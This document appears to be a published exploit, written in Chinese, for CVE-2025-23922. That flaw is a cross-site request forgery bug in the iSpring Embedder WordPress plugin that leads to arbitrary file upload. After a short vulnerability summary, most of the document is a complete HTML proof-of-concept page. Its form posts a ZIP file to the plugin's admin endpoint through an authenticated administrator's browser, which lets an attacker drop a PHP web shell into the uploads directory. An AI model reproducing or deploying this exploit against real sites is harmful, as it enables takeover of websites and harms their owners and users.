CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:HiSpring Embedder WordPress 插件中存在一个 CSRF 漏洞,允许未经身份验证的远程攻击者诱骗已通过身份验证的管理员向服务器上传任意文件(例如 PHP 网页木马)。
存在漏洞的端点未实施任何 CSRF 保护,并且文件上传功能接受 .zip 文件,这些文件会被解压到以下位置:
/wp-content/uploads/iSpring_embedder/
攻击者可以:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CSRF 文件上传利用</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f4f4f4;
padding: 20px;
}
.container {
background: #fff;
padding: 25px;
border-radius: 10px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
max-width: 600px;
margin: auto;
}
h1 {
color: #d9534f;
}
input[type="file"],
input[type="submit"] {
margin-top: 10px;
padding: 10px;
font-size: 16px;
}
.footer {
margin-top: 30px;
font-size: 14px;
color: #777;
text-align: center;
}
</style>
</head>
<body>
<div class="container">
<h1>CSRF 利用 – 文件上传</h1>
<p>
这是以下漏洞的概念验证 (PoC) 利用代码:
</p>
<ul>
<li><strong>漏洞类型:</strong>CSRF 导致任意文件上传</li>
<li><strong>插件:</strong>iSpring Embedder for WordPress(<= v1.0)</li>
<li><strong>CVE:</strong>CVE-2025-23922</li>
<li><strong>影响:</strong>远程攻击者可迫使已通过身份验证的管理员上传任意文件,可能包括网页木马。</li>
<li><strong>上传路径:</strong><code>/wp-content/uploads/iSpring_embedder/</code></li>
</ul>
<form id="csrfForm" action="http://wordpresssite/wp-admin/admin.php?page=ispring-embedder" method="POST" enctype="multipart/form-data">
<label><strong>选择要上传的 ZIP 文件:</strong></label><br>
<input type="file" name="zip_file" required><br>
<input type="hidden" name="file_name" value="exploit_csrf">
<input type="submit" name="submit_ispring_form" value="通过 CSRF 上传文件">
</form>
<div class="footer">
<p>
针对 <strong>CSRF 导致任意文件上传漏洞</strong> 的利用代码<br>
<strong>CVE-2025-23922</strong><br>
开发者:<strong>Nxploit | Khaled Alenazi</strong>
</p>
</div>
</div>
</body>
</html>
此概念验证仅供教育和研究目的使用。
作者对因使用此利用代码而导致的任何滥用或损害概不负责。
Nxploit | Khaled Alenazi
安全研究员与漏洞利用开发者
https://github.com/Nxploit